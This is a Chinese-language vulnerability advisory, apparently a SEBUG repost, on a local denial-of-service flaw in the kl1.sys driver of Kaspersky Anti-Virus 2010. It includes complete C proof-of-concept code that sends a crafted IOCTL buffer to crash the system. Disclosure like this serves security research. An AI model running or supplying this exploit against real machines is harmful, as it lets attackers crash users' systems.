Kaspersky Anti-Virus kl1.sys驱动本地拒绝服务漏洞_程序开发

Kaspersky Anti-Virus kl1.sys驱动本地拒绝服务漏洞

创始人

2024-06-12 08:40:41

0次

影响版本: Kaspersky Labs Kaspersky Antivirus 2010 9.0.0.463

漏洞描述: BUGTRAQ ID: 37044

Kaspersky Antivirus是非常流行的杀毒软件。

Kaspersky杀毒软件所使用的kl1.sys驱动没有检查IOCTL的输入地址，如果用户修改了一个或两个DWORD就可以触发异常，导致系统蓝屏死机。

<*参考 Heurs （heurs@ghostsinthstack.org） *>
测试方法:

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

#include

int __cdecl main(int argc, char* argv[]) 
{ 
    HANDLE hDevice = (HANDLE) 0xffffffff; 
    DWORD NombreByte; 
    DWORD Crashing[] = { 
         0x3ff8f44a, 0x9d4ad6c2, 0xd883673e, 0x0a06ac2a, 
         0x3d4552b1, 0x3b2f314e, 0xeb6dfc7e, 0xfcfdf961, 
         0xde0f4405, 0xaa76f8eb, 0x2dbc6ead, 0x534047f9, 
         0xb5ebadc5 
        }; 
    BYTE Out[0x20]; 
     
    printf("Local DoS - Kaspersky 2010 9.0.0.463\n\n"); 
    hDevice = CreateFile("\\\\.\\kimul25",GENERIC_READ|GENERIC_WRITE,0,NULL,OPEN_EXISTING,0,NULL); 
     
    DeviceIoControl(hDevice,0x0022c008,Crashing,sizeof(Crashing),Out,sizeof(Out),&NombreByte,NULL); 
     
    printf("Sploit Send.\nhDevice = %x\n", hDevice); 
    CloseHandle(hDevice); 
    getch(); 
    return 0; 
}

SEBUG安全建议:

厂商补丁：

Kaspersky Labs

目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.kaspersky.com/

【编辑推荐】

Cisco IOS MSFC2 畸形二层帧远程拒绝服务安全缺陷
Sun OpenSolaris内核Panic远程拒绝服务漏洞
谷歌发布Android安全漏洞补丁修复两个DoS漏洞

上一篇：11月第3周要闻回顾:谷歌Chrome OS真容初现 PDC2009亮点多多

下一篇：抹掉所有进程中自己的句柄

Kaspersky Anti-Virus kl1.sys驱动本地拒绝服务漏洞

相关内容

热门资讯